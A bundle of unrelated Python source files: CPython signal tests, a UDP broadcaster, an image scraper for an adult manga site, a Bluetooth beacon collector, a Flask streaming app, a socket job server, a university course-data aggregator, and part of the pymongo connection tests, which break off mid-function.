def test_invalid_argument(self):
try:
SIGHUP = 1 # not supported on win32
signal.raise_signal(SIGHUP)
self.fail("OSError (Invalid argument) expected")
except OSError as e:
if e.errno == errno.EINVAL:
pass
else:
raise
def test_handler(self):
is_ok = False
def handler(a, b):
nonlocal is_ok
is_ok = True
old_signal = signal.signal(signal.SIGINT, handler)
self.addCleanup(signal.signal, signal.SIGINT, old_signal)
signal.raise_signal(signal.SIGINT)
self.assertTrue(is_ok)
class PidfdSignalTest(unittest.TestCase):
@unittest.skipUnless(
hasattr(signal, "pidfd_send_signal"),
"pidfd support not built in",
)
def test_pidfd_send_signal(self):
with self.assertRaises(OSError) as cm:
signal.pidfd_send_signal(0, signal.SIGINT)
if cm.exception.errno == errno.ENOSYS:
self.skipTest("kernel does not support pidfds")
elif cm.exception.errno == errno.EPERM:
self.skipTest("Not enough privileges to use pidfs")
self.assertEqual(cm.exception.errno, errno.EBADF)
my_pidfd = os.open(f'/proc/{os.getpid()}', os.O_DIRECTORY)
self.addCleanup(os.close, my_pidfd)
with self.assertRaisesRegex(TypeError, "^siginfo must be None$"):
signal.pidfd_send_signal(my_pidfd, signal.SIGINT, object(), 0)
with self.assertRaises(KeyboardInterrupt):
signal.pidfd_send_signal(my_pidfd, signal.SIGINT)
def tearDownModule():
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
UdpBroadcaster.py
|
import os
import sys
import logging
import socket
import threading
import time
import datetime
import logging
import psutil
#import netifaces
import Controller
class UdpBroadcaster(Controller.Controller):
DEBUG_INTERVAL = 5 * 60 # 5 minutes
def __init__(self, name, port, delay, log_level):
self.name = name
self.port = port
self.delay = delay
self.logger = logging.getLogger(name)
self.logger.setLevel(log_level)
self.shutdown = False
self.last_debug_dt = None
def start(self):
self.logger.debug("Starting port=%s", self.port)
try:
self.run_thread = threading.Thread(target=self.run,args=())
self.run_thread.start()
except socket.error as ex:
self.shutdown = True
self.logger.error("start ex=%s", ex)
def stop(self):
self.logger.debug("stopping....")
self.shutdown = True
self.logger.debug("join th:%s run_thread", self.run_thread.getName())
self.run_thread.join()
self.logger.debug("stopped")
def run(self):
self.logger.debug("running....")
try:
while not self.shutdown:
self.broadcast()
time.sleep(self.delay)
except Exception as ex:
self.shutdown = True
self.logger.error("run ex=%s", ex)
self.logger.debug("terminated")
def broadcast(self):
addresses = self.get_valid_ip4_addresses()
ds = 1917 if self.last_debug_dt is None else (datetime.datetime.now()-self.last_debug_dt).total_seconds()
if ds>=self.DEBUG_INTERVAL:
self.logger.debug("broadcaster ip4 addresses found:%s", addresses)
self.last_debug_dt = datetime.datetime.now()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.settimeout(0.2)
hostname = socket.gethostname()
for addr in addresses:
#message = "{}||{}-Server||{}||{}".format(type, hostname, addr, port)
message = self.get_message(hostname, addr)
sock.sendto(bytes(message, "utf8"), ("<broadcast>",self.port))
time.sleep(0.1)
sock.close()
def get_message(self, hostname, addr):
return "Hello world"
#def get_ip_addresses_using_netifaces(family=netifaces.AF_INET):
# ip_list = []
# for interface in netifaces.interfaces():
# links = netifaces.ifaddresses(interface)
#
# for link in ifaddresses(interface)[family]:
# ip_list.append(link["addr"])
# return ip_list
def get_ip_addresses(self, family=socket.AF_INET):
for interface, snics in psutil.net_if_addrs().items():
for snic in snics:
if snic.family == family:
yield (interface, snic.address)
def get_valid_ip4_addresses(self):
return [s[1] for s in self.get_ip_addresses() if not s[1].startswith(("127.", "169.254."))]
def test():
logging.basicConfig(format="%(process)d-%(levelname)s-%(message)s", level=logging.DEBUG)
logging.info("Starting... platform=%s", sys.platform)
broadcaster = UdpBroadcaster("TestUdpBroadcaster", 4242, 3)
broadcaster.start()
input("Press Enter to continue...")
broadcaster.stop()
if __name__ == "__main__":
test()
|
Nhentai.py
|
import requests
from bs4 import BeautifulSoup
import sys
from Site import Common
from time import sleep
import threading
import queue
class Nhentai:
def __init__(self, url):
self.title=''#
self.chapters=['']
#initial author only for title page
self.author=''#
#the h1 tag
self.temp=[]
self.rawstoryhtml=['']
self.truestoryhttml=[]
self.length=1
self.pbar=None
self.url=url
self.images=[] #testing images
self.hasimages = True
self.isize=0
self.duplicate = False
self.queue = queue.Queue()
page = Common.RequestPage(url)
if page is None:
print('Could not complete request for page: ' + url)
return None
soup=BeautifulSoup(page.content, 'html.parser')
self.title = soup.find('meta', attrs={'itemprop':'name'}).get('content')
if Common.dup:
if Common.CheckDuplicate(self.title):
self.duplicate = True
return None
for au in soup.find_all('div', attrs={'class':'tag-container'}):
#print('HERE1')
for au2 in au.find_all('a'):
#print('HERE2')
if au2.get('href')[:7]=='/artist':
#print('HERE')
self.author=au2.get('href')[8:-1]
#print(self.author)
Common.prnt(self.title+' by '+self.author)
self.truestoryhttml.append('')
self.isize=len(soup.find_all('a', attrs={'rel':'nofollow'}))
if any(x in ('html', 'HTML', 'txt', 'TXT') for x in Common.opf):
self.pbar = Common.Progress(self.isize)
for i in soup.find_all('a', attrs={'rel':'nofollow'}):
self.GetURLS(i.get('href'))
break
self.AddPage()
if any(x in ('txt', 'html', 'TXT', 'HTML') for x in Common.opf) and Common.mt:
for i in range(0, len(self.images)):
self.queue.get()
if self.pbar is not None:
self.pbar.End()
def GetURLS(self, url):
page=Common.RequestPage('https://nhentai.net'+url.rstrip(), headers={'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'})
if page is None:
print('Could not complete request for page: ' + url)
return None
soup=BeautifulSoup(page.content, 'html.parser')
try:
thisimage=soup.find('section', attrs={'id':'image-container'}).find('img').get('src')
self.images.append(thisimage)
except:
print('Error in: '+url)
for i in range(2, self.isize+1):
self.images.append(thisimage[:-5]+str(i)+thisimage[-4:])
def AddPage(self):
i = 1
for thisimage in self.images:
#print(thisimage)
if any(x in ('html', 'HTML', 'epub', 'EPUB') for x in Common.opf):
zeros = '0' * (len(str(self.isize))-1)
num = i
if len(zeros)>1 and num > 9:
zeros='0'
elif len(zeros)==1 and num > 9:
zeros = ''
if num > 99:
zeros = ''
self.truestoryhttml[0]=self.truestoryhttml[0]+'<p><img src="'+zeros+str(num)+'.jpg" /></p>\n'
if any(x in ('html', 'HTML', 'txt', 'TXT') for x in Common.opf):
if Common.mt:
t=threading.Thread(target=Common.imageDL, args=(self.title, thisimage, i, self.isize, self.pbar, self.queue), daemon=False)
t.start()
else:
Common.imageDL(self.title, thisimage, i, self.isize, self.pbar)
i+=1
|
collectionPoint.py
|
"""
BTLE iBeacon collection module
WIP
RegisteredClientRegistery manages the list of clients that are in rage
event manager controllers and handles events and figures out if the event needs to be handled and put in the list of registered clients
"""
import sys
sys.path.append('./collection_modules/btleCollectionPoint/devices/bluegiga')
sys.path.append('./collection_modules/btleCollectionPoint/libs')
from simplesensor.collection_modules.btle_beacon import moduleConfigLoader as configLoader
from devices.bluegiga.btleThread import BlueGigaBtleCollectionPointThread
from .registeredClientRegistry import RegisteredClientRegistry
from simplesensor.shared import ThreadsafeLogger, ModuleProcess
from .repeatedTimer import RepeatedTimer
from .eventManager import EventManager
from threading import Thread
import multiprocessing as mp
import time
class BtleCollectionPoint(ModuleProcess):
def __init__(self, baseConfig, pInBoundQueue, pOutBoundQueue, loggingQueue):
""" Initialize new CamCollectionPoint instance.
Setup queues, variables, configs, constants and loggers.
"""
super(BtleCollectionPoint, self).__init__()
self.loggingQueue = loggingQueue
self.logger = ThreadsafeLogger(loggingQueue, __name__)
# Queues
self.outQueue = pOutBoundQueue # Messages from this thread to the main process
self.inQueue = pInBoundQueue
self.queueBLE = mp.Queue()
# Configs
self.moduleConfig = configLoader.load(self.loggingQueue)
self.config = baseConfig
# Variables and objects
self.registeredClientRegistry = RegisteredClientRegistry(self.moduleConfig, self.loggingQueue)
self.eventManager = EventManager(self.moduleConfig, pOutBoundQueue, self.registeredClientRegistry, self.loggingQueue)
self.alive = True
self.btleThread = None
self.BLEThread = None
self.repeatTimerSweepClients = None
# Constants
self._cleanupInterval = self.moduleConfig['AbandonedClientCleanupInterval']
def run(self):
###Pausing Startup to wait for things to start after a system restart
self.logger.info("Pausing execution 15 seconds waiting for other system services to start")
time.sleep(15)
self.logger.info("Done with our nap. Time to start looking for clients")
self.btleThread = BlueGigaBtleCollectionPointThread(self.queueBLE, self.moduleConfig, self.loggingQueue)
self.BLEThread = Thread(target=self.btleThread.bleDetect, args=(__name__,10))
self.BLEThread.daemon = True
self.BLEThread.start()
# Setup repeat task to run the sweep every X interval
self.repeatTimerSweepClients = RepeatedTimer((self._cleanupInterval/1000), self.registeredClientRegistry.sweepOldClients)
# Process queue from main thread for shutdown messages
self.threadProcessQueue = Thread(target=self.processQueue)
self.threadProcessQueue.setDaemon(True)
self.threadProcessQueue.start()
#read the queue
while self.alive:
if not self.queueBLE.empty():
result = self.queueBLE.get(block=False, timeout=1)
self.__handleBtleClientEvents(result)
def processQueue(self):
self.logger.info("Starting to watch collection point inbound message queue")
while self.alive:
if not self.inQueue.empty():
self.logger.info("Queue size is %s" % self.inQueue.qsize())
try:
message = self.inQueue.get(block=False,timeout=1)
if message is not None:
if (message.topic=="SHUTDOWN" and message.sender_id=='main'):
self.logger.info("SHUTDOWN command handled on %s" % __name__)
self.shutdown()
else:
self.handleMessage(message)
except Exception as e:
self.logger.error("Unable to read queue, error: %s " %e)
self.shutdown()
self.logger.info("Queue size is %s after" % self.inQueue.qsize())
else:
time.sleep(.25)
def __handleBtleClientEvents(self, detectedClients):
for client in detectedClients:
self.logger.debug("--- Found client ---")
self.logger.debug(vars(client))
self.logger.debug("--- Found client end ---")
self.eventManager.registerDetectedClient(client)
def handleMessage(self, msg):
# Handle incoming messages, eg. from other collection points
pass
def shutdown(self):
self.logger.info("Shutting down")
self.repeatTimerSweepClients.stop()
self.btleThread.stop()
self.alive = False
time.sleep(1)
self.exit = True
|
app.py
|
import logging
from threading import Thread
from flask import Blueprint
from mini_vstreamer.api.defaults import app, api, system
from mini_vstreamer.api.endpoints.configs import ns as config_ns
from mini_vstreamer.core.config import ConfigIO
from mini_vstreamer.core.stream.queue import mutate_system as load_queues
from mini_vstreamer.core.stream.camera import mutate_system as load_cameras
def setup(flask_app):
#flask_app.config['SERVER_NAME'] = '.0:8888'
flask_app.config['SWAGGER_UI_DOC_EXPANSION'] = 'list'
flask_app.config['RESTPLUS_VALIDATE'] = True
flask_app.config['RESTPLUS_MASK_SWAGGER'] = False
#flask_app.config['ERROR_404_HELP'] =
def initialize_app(flask_app):
setup(flask_app)
blueprint = Blueprint('api', __name__, url_prefix='/api')
api.init_app(blueprint)
@flask_app.route('/foo')
def foo():
return 'foo'
api.add_namespace(config_ns)
#api.add_namespace(blog_categories_namespace)
flask_app.register_blueprint(blueprint)
#db.init_app(flask_app
def independent_collector():
while True:
if system['queues']['frames'] is None:
print('queue is None')
camera_name, frame = system['queues']['frames'].get()
system['video'][camera_name] = frame
system['queues']['frames'].task_done()
def main():
initialize_app(app)
logging.info('>>>>> Starting development server at http://{}/api/ <<<<<'.format(app.config['SERVER_NAME']))
config = ConfigIO('./config.yaml')
load_queues(config)
load_cameras(config)
c_thread = Thread(name='Collector' ,target=independent_collector, args=())
c_thread.daemon=True
c_thread.start()
app.run(host='0.0.0.0', port=8888, threaded=True)
if __name__ == '__main__':
main()
|
server.py
|
import sys
try:
sys.dont_write_bytecode = True
except:
pass
import os
FINISH = False
manager = None
zeLock = None
def checkPsUtil():
try:
import psutil
except:
raise Exception("Python package psutil could not be imported!! Aborting.")
def periodicRefresh():
""" Periodic refresh launched in a thread to handle jobs killed outside the Sserver """
global FINISH, manager, zeLock
import time
while not FINISH:
zeLock.acquire()
manager.refresh()
zeLock.release()
time.sleep(2)
def main1():
global manager, FINISH, zeLock
import threading
import socket
from port import PORT
import job_manager
zeLock = threading.Lock()
manager = job_manager.SJobManager()
th = threading.Thread(target=periodicRefresh)
th.start()
HOST = '' # Symbolic name meaning all available interfaces
# Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
ok=1
while ok:
conn, addr = s.accept()
data = conn.recv(job_manager.MAX_SEND_RCV_SIZE)
zeLock.acquire()
ok = manager.handle(conn,data.decode("UTF-8"))
zeLock.release()
FINISH = True
th.join()
s.close()
def main2():
import socket
from port import PORT
import job_manager
manager = job_manager.SJobManager()
HOST = '' # Symbolic name meaning all available interfaces
# Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
ok=1
while ok:
conn, addr = s.accept()
data = conn.recv(1024)
try:
reload(job_manager) ## [ABN] hmmm, not too sure now this is in a class ...
ok = manager.handle(conn,data)
except :
print ("Error: %s" % data)
print ("Unexpected error:")
print(sys.exc_info()[1])
s.close()
pass
if __name__ == '__main__':
checkPsUtil()
main1()
pass
|
aggregate.py
|
# @file aggregate.py
# @brief One script to rule them all.
#
# Downloads schedule data for a specific semester, including course
# meeting times, course descriptions, pre/corequisites, FCEs, and so on.
# @author Justin Gallagher (jrgallag@andrew.cmu.edu)
# @since 2015-04-07
import json
import os.path
from datetime import date
from cmu_course_api.parse_descs import get_course_desc
from cmu_course_api.parse_schedules import parse_schedules
# imports used for multithreading
import threading
from queue import Queue
from os import cpu_count
from queue import Empty
# Constants
SOURCES = os.path.join(os.path.dirname(__file__), 'data/schedule_pages.txt')
SEMESTER_ABBREV = {
'Spring': 'S',
'Fall': 'F',
'Summer': 'M'
}
# @function aggregate
# @brief Combines the course descriptions and schedules into one object.
# @param schedules: Course schedules object as returned by parse_descs.
# @return An object containing the aggregate of the three datasets.
def aggregate(schedules):
courses = {}
semester = schedules['semester'].split(' ')[0]
semester = SEMESTER_ABBREV[semester]
year = schedules['semester'].split(' ')[-1][2:]
count = cpu_count()
lock = threading.Lock()
queue = Queue()
if count is None:
count = 4
for course in schedules['schedules']:
queue.put(course)
queue_size = queue.qsize()
fces_processed = 0
def run():
while True:
try:
course = queue.get(timeout=4)
except Empty:
return
nonlocal queue_size, fces_processed
with lock:
fces_processed += 1
print('\r[{}/{}] Getting description for {}...'.format(
fces_processed, queue_size, course['num']), end="")
desc = get_course_desc(course['num'], semester, year)
desc['name'] = course['title']
try:
desc['units'] = float(course['units'])
except ValueError:
desc['units'] = None
desc['department'] = course['department']
desc['lectures'] = course['lectures']
desc['sections'] = course['sections']
names_dict = desc.pop('names_dict', {})
for key in ('lectures', 'sections'):
for meeting in desc[key]:
if meeting['name'] in names_dict:
meeting['instructors'] = names_dict[meeting['name']]
number = course['num'][:2] + '-' + course['num'][2:]
with lock:
courses[number] = desc
queue.task_done()
print("running on " + str(count) + " threads")
for _ in range(count):
thread = threading.Thread(target=run)
thread.setDaemon(True)
thread.start()
queue.join()
print("")
return {'courses': courses, 'rundate': str(date.today()),
'semester': schedules['semester']}
# @function get_course_data
# @brief Used for retrieving all information from the course-api for a given
# semester.
# @param semester: The semester to get data for. Must be one of [S, M1, M2, F].
# @return Object containing all course-api data - see README.md for more
# information.
def get_course_data(semester):
schedules = parse_schedules(semester)
return aggregate(schedules)
|
test_connection.py
|
# Copyright 2009-2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the connection module."""
import datetime
import os
import sys
import time
import thread
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from bson.son import SON
from bson.tz_util import utc
from pymongo.connection import Connection
from pymongo.database import Database
from pymongo.pool import NO_REQUEST, NO_SOCKET_YET, SocketInfo
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
InvalidName,
InvalidURI,
OperationFailure)
from test import version
from test.utils import is_mongos, server_is_master_with_slave, delay
host = os.environ.get("DB_IP", "localhost")
port = int(os.environ.get("DB_PORT", 27017))
def get_connection(*args, **kwargs):
return Connection(host, port, *args, **kwargs)
class TestConnection(unittest.TestCase):
def setUp(self):
self.host = os.environ.get("DB_IP", "localhost")
self.port = int(os.environ.get("DB_PORT", 27017))
def test_types(self):
self.assertRaises(TypeError, Connection, 1)
self.assertRaises(TypeError, Connection, 1.14)
self.assertRaises(TypeError, Connection, "localhost", "27017")
self.assertRaises(TypeError, Connection, "localhost", 1.14)
self.assertRaises(TypeError, Connection, "localhost", [])
self.assertRaises(ConfigurationError, Connection, [])
def test_constants(self):
Connection.HOST = self.host
Connection.PORT = self.port
self.assertTrue(Connection())
Connection.HOST = "somedomainthatdoesntexist.org"
Connection.PORT = 123456789
self.assertRaises(ConnectionFailure, Connection, connectTimeoutMS=600)
self.assertTrue(Connection(self.host, self.port))
Connection.HOST = self.host
Connection.PORT = self.port
self.assertTrue(Connection())
def test_connect(self):
self.assertRaises(ConnectionFailure, Connection,
"somedomainthatdoesntexist.org", connectTimeoutMS=600)
self.assertRaises(ConnectionFailure, Connection, self.host, 123456789)
self.assertTrue(Connection(self.host, self.port))
def test_host_w_port(self):
self.assertTrue(Connection("%s:%d" % (self.host, self.port)))
self.assertRaises(ConnectionFailure, Connection,
"%s:1234567" % (self.host,), self.port)
def test_repr(self):
self.assertEqual(repr(Connection(self.host, self.port)),
"Connection('%s', %d)" % (self.host, self.port))
def test_getters(self):
self.assertEqual(Connection(self.host, self.port).host, self.host)
self.assertEqual(Connection(self.host, self.port).port, self.port)
self.assertEqual(set([(self.host, self.port)]),
Connection(self.host, self.port).nodes)
def test_get_db(self):
connection = Connection(self.host, self.port)
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, connection, "")
self.assertRaises(InvalidName, make_db, connection, "te$t")
self.assertRaises(InvalidName, make_db, connection, "te.t")
self.assertRaises(InvalidName, make_db, connection, "te\\t")
self.assertRaises(InvalidName, make_db, connection, "te/t")
self.assertRaises(InvalidName, make_db, connection, "te st")
self.assertTrue(isinstance(connection.test, Database))
self.assertEqual(connection.test, connection["test"])
self.assertEqual(connection.test, Database(connection, "test"))
def test_database_names(self):
connection = Connection(self.host, self.port)
connection.pymongo_test.test.save({"dummy": u"object"})
connection.pymongo_test_mike.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
def test_drop_database(self):
connection = Connection(self.host, self.port)
self.assertRaises(TypeError, connection.drop_database, 5)
self.assertRaises(TypeError, connection.drop_database, None)
raise SkipTest("This test often fails due to SERVER-2329")
connection.pymongo_test.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
connection.drop_database("pymongo_test")
dbs = connection.database_names()
self.assertTrue("pymongo_test" not in dbs)
connection.pymongo_test.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
connection.drop_database(connection.pymongo_test)
dbs = connection.database_names()
self.assertTrue("pymongo_test" not in dbs)
def test_copy_db(self):
c = Connection(self.host, self.port)
self.assertTrue(c.in_request())
self.assertRaises(TypeError, c.copy_database, 4, "foo")
self.assertRaises(TypeError, c.copy_database, "foo", 4)
self.assertRaises(InvalidName, c.copy_database, "foo", "$foo")
c.pymongo_test.test.drop()
c.drop_database("pymongo_test1")
c.drop_database("pymongo_test2")
c.pymongo_test.test.insert({"foo": "bar"})
# Due to SERVER-2329, databases may not disappear from a master in a
# master-slave pair
if not server_is_master_with_slave(c):
self.assertFalse("pymongo_test1" in c.database_names())
self.assertFalse("pymongo_test2" in c.database_names())
c.copy_database("pymongo_test", "pymongo_test1")
# copy_database() didn't accidentally end the request
self.assertTrue(c.in_request())
self.assertTrue("pymongo_test1" in c.database_names())
self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
c.end_request()
c.copy_database("pymongo_test", "pymongo_test2",
"%s:%d" % (self.host, self.port))
# copy_database() didn't accidentally restart the request
self.assertFalse(c.in_request())
self.assertTrue("pymongo_test2" in c.database_names())
self.assertEqual("bar", c.pymongo_test2.test.find_one()["foo"])
if version.at_least(c, (1, 3, 3, 1)):
c.drop_database("pymongo_test1")
c.pymongo_test.add_user("mike", "password")
self.assertRaises(OperationFailure, c.copy_database,
"pymongo_test", "pymongo_test1",
username="foo", password="bar")
if not server_is_master_with_slave(c):
self.assertFalse("pymongo_test1" in c.database_names())
self.assertRaises(OperationFailure, c.copy_database,
"pymongo_test", "pymongo_test1",
username="mike", password="bar")
if not server_is_master_with_slave(c):
self.assertFalse("pymongo_test1" in c.database_names())
if not is_mongos(c):
# See SERVER-6427
c.copy_database("pymongo_test", "pymongo_test1",
username="mike", password="password")
self.assertTrue("pymongo_test1" in c.database_names())
self.assertEqual("bar", c.pymongo_test1.test.find_one()["foo"])
def test_iteration(self):
connection = Connection(self.host, self.port)
def iterate():
[a for a in connection]
self.assertRaises(TypeError, iterate)
def test_disconnect(self):
c = Connection(self.host, self.port)
coll = c.foo.bar
c.disconnect()
c.disconnect()
coll.count()
c.disconnect()
c.disconnect()
coll.count()
def test_from_uri(self):
c = Connection(self.host, self.port)
self.assertEqual(c, Connection("mongodb://%s:%d" %
(self.host, self.port)))
c.admin.system.users.remove({})
c.pymongo_test.system.users.remove({})
try:
# First admin user add fails gle in MongoDB >= 2.1.2
# See SERVER-4225 for more information.
c.admin.add_user("admin", "pass")
except OperationFailure:
pass
c.admin.authenticate("admin", "pass")
c.pymongo_test.add_user("user", "pass")
self.assertRaises(ConfigurationError, Connection,
"mongodb://foo:bar@%s:%d" % (self.host, self.port))
self.assertRaises(ConfigurationError, Connection,
"mongodb://admin:bar@%s:%d" % (self.host, self.port))
self.assertRaises(ConfigurationError, Connection,
"mongodb://user:pass@%s:%d" % (self.host, self.port))
Connection("mongodb://admin:pass@%s:%d" % (self.host, self.port))
self.assertRaises(ConfigurationError, Connection,
"mongodb://admin:pass@%s:%d/pymongo_test" %
(self.host, self.port))
self.assertRaises(ConfigurationError, Connection,
"mongodb://user:foo@%s:%d/pymongo_test" %
(self.host, self.port))
Connection("mongodb://user:pass@%s:%d/pymongo_test" %
(self.host, self.port))
self.assertTrue(Connection("mongodb://%s:%d" %
(self.host, self.port),
slave_okay=True).slave_okay)
self.assertTrue(Connection("mongodb://%s:%d/?slaveok=true;w=2" %
(self.host, self.port)).slave_okay)
c.admin.system.users.remove({})
c.pymongo_test.system.users.remove({})
def test_fork(self):
# Test using a connection before and after a fork.
if sys.platform == "win32":
raise SkipTest("Can't fork on windows")
try:
from multiprocessing import Process, Pipe
except ImportError:
raise SkipTest("No multiprocessing module")
db = Connection(self.host, self.port).pymongo_test
# Failure occurs if the connection is used before the fork
db.test.find_one()
db.connection.end_request()
def loop(pipe):
while True:
try:
db.test.insert({"a": "b"}, safe=True)
for _ in db.test.find():
pass
except:
pipe.send(True)
os._exit(1)
cp1, cc1 = Pipe()
cp2, cc2 = Pipe()
p1 = Process(target=loop, args=(cc1,))
p2 = Process(target=loop, args=(cc2,))
p1.start()
p2.start()
p1.join(1)
p2.join(1)
p1.terminate()
p2.terminate()
p1.join()
p2.join()
cc1.close()
cc2.close()
# recv will only have data if the subprocess failed
try:
cp1.recv()
self.fail()
except EOFError:
pass
try:
cp2.recv()
self.fail()
except EOFError:
pass
def test_document_class(self):
c = Connection(self.host, self.port)
db = c.pymongo_test
db.test.insert({"x": 1})
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.document_class = SON
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c = Connection(self.host, self.port, document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.document_class = dict
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
def test_timeouts(self):
conn = Connection(self.host, self.port, connectTimeoutMS=10500)
self.assertEqual(10.5, conn._Connection__pool.conn_timeout)
conn = Connection(self.host, self.port, socketTimeoutMS=10500)
self.assertEqual(10.5, conn._Connection__pool.net_timeout)
def test_network_timeout(self):
no_timeout = Connection(self.host, self.port)
timeout_sec = 1
timeout = Connection(self.host, self.port, network_timeout=timeout_sec)
no_timeout.pymongo_test.drop_collection("test")
no_timeout.pymongo_test.test.insert({"x": 1}, safe=True)
# A $where clause that takes a second longer than the timeout
where_func = delay(timeout_sec + 1)
def get_x(db):
doc = db.test.find().where(where_func).next()
return doc["x"]
self.assertEqual(1, get_x(no_timeout.pymongo_test))
self.assertRaises(ConnectionFailure, get_x, timeout.pymongo_test)
def get_x_timeout(db, t):
doc = db.test.find(network_timeout=t).where(where_func).next()
return doc["x"]
self.assertEqual(1, get_x_timeout(timeout.pymongo_test, None))
self.assertRaises(ConnectionFailure, get_x_timeout,
no_timeout.pymongo_test, 0.1)
def test_tz_aware(self):
self.assertRaises(ConfigurationError, Connection, tz_aware='foo')
aware = Connection(self.host, self.port, tz_aware=True)
naive = Connection(self.host, self.port)
aware.pymongo_test.drop_collection("test")
now = datetime.datetime.utcnow()
aware.pymongo_test.test.insert({"x": now}, safe=True)
self.assertEqual(None, naive.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(utc, aware.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(
aware.pymongo_test.test.find_one()["x"].replace(tzinfo=None),
naive.pymongo_test.test.find_one()["x"])
def test_ipv6(self):
try:
connection = Connection("[::1]")
except:
# Either mongod was started without --ipv6
# or the OS doesn't support it (or both).
raise SkipTest("No IPv6")
# Try a few simple things
connection = Connection("mongodb://[::1]:%d" % (self.port,))
connection = Connection("mongodb://[::1]:%d/"
"?slaveOk=true" % (self.port,))
connection = Connection("[::1]:%d,"
"localhost:%d" % (self.port, self.port))
connection = Connection("localhost:%d,"
"[::1]:%d" % (self.port, self.port))
connection.pymongo_test.test.save({"dummy": u"object"})
connection.pymongo_test_bernie.test.save({"dummy": u"object"})
dbs = connection.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_bernie" in dbs)
def test_fsync_lock_unlock(self):
c = get_connection()
if is_mongos(c):
raise SkipTest('fsync/lock not supported by mongos')
self.assertFalse(c.is_locked)
# async flushing not supported on windows...
if sys.platform not in ('cygwin', 'win32'):
c.fsync(async=True)
self.assertFalse(c.is_locked)
c.fsync(lock=True)
self.assertTrue(c.is_locked)
locked = True
c.unlock()
for _ in xrange(5):
locked = c.is_locked
if not locked:
break
time.sleep(1)
self.assertFalse(locked)
def test_contextlib(self):
if sys.version_info < (2, 6):
raise SkipTest("With statement requires Python >= 2.6")
import contextlib
conn = get_connection(auto_start_request=False)
conn.pymongo_test.drop_collection("test")
conn.pymongo_test.test.insert({"foo": "bar"})
# The socket used for the previous commands has been returned to the
# pool
self.assertEqual(1, len(conn._Connection__pool.sockets))
# We need exec here because if the Python version is less than 2.6
# these with-statements won't even compile.
exec """
with contextlib.closing(conn):
self.assertEqual("bar", conn.pymongo_test.test.find_one()["foo"])
self.assertEqual(0, len(conn._Connection__pool.sockets))
"""
exec """
with get_connection() as connection:
self.assertEqual("bar", connection.pymongo_test.test.find_one()["foo"])
# Calling conn.close() has reset the pool
self.assertEqual(0, len(connection._Connection__pool.sockets))
"""
def get_sock(self, pool):
sock_info = pool.get_socket((self.host, self.port))
return sock_info
def assertSameSock(self, pool):
sock_info0 = self.get_sock(pool)
sock_info1 = self.get_sock(pool)
self.assertEqual(sock_info0, sock_info1)
pool.maybe_return_socket(sock_info0)
pool.maybe_return_socket(sock_info1)
def assertDifferentSock(self, pool):
# We have to hold both SocketInfos at the same time, otherwise the
# first will send its socket back to the pool as soon as its ref count
# goes to zero, in which case the second SocketInfo we get will have
# the same socket as the first.
sock_info0 = self.get_sock(pool)
sock_info1 = self.get_sock(pool)
self.assertNotEqual(sock_info0, sock_info1)
pool.maybe_return_socket(sock_info0)
pool.maybe_return_socket(sock_info1)
def assertNoRequest(self, pool):
self.assertEqual(NO_REQUEST, pool._get_request_state())
def assertNoSocketYet(self, pool):
self.assertEqual(NO_SOCKET_YET, pool._get_request_state())
def assertRequestSocket(self, pool):
self.assertTrue(isinstance(pool._get_request_state(), SocketInfo))
def test_with_start_request(self):
conn = get_connection(auto_start_request=False)
pool = conn._Connection__pool
# No request started
self.assertNoRequest(pool)
self.assertDifferentSock(pool)
# Start a request
request_context_mgr = conn.start_request()
self.assertTrue(
isinstance(request_context_mgr, object)
)
self.assertNoSocketYet(pool)
self.assertSameSock(pool)
self.assertRequestSocket(pool)
# End request
request_context_mgr.__exit__(None, None, None)
self.assertNoRequest(pool)
self.assertDifferentSock(pool)
# Test the 'with' statement
if sys.version_info >= (2, 6):
# We need exec here because if the Python version is less than 2.6
# these with-statements won't even compile.
exec """
with conn.start_request() as request:
self.assertEqual(conn, request.connection)
self.assertNoSocketYet(pool)
self.assertSameSock(pool)
self.assertRequestSocket(pool)
"""
# Request has ended
self.assertNoRequest(pool)
self.assertDifferentSock(pool)
def test_auto_start_request(self):
for bad_horrible_value in (None, 5, 'hi!'):
